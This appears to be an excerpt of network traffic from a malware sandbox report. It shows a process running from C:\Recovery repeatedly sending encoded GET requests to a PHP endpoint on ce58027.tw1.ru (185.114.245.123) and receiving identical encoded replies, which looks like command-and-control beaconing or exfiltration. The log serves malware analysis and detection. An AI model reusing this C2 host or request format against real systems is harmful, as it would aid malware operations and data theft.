Dec 29, 2024 00:07:54.902853012 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:07:56.374991894 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:07:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:01.528532028 CET	2079	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjM [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:08:02.922554970 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49770	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:08.152682066 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:08:09.492234945 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49786	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:14.623560905 CET	2105	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:08:16.010059118 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49802	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:21.138501883 CET	2105	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:08:22.530730009 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49817	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:27.668979883 CET	2105	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:08:29.007096052 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49832	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:34.138040066 CET	2105	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:08:35.666656017 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49847	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:40.797029972 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:08:42.144026995 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49860	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:47.277765036 CET	2129	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
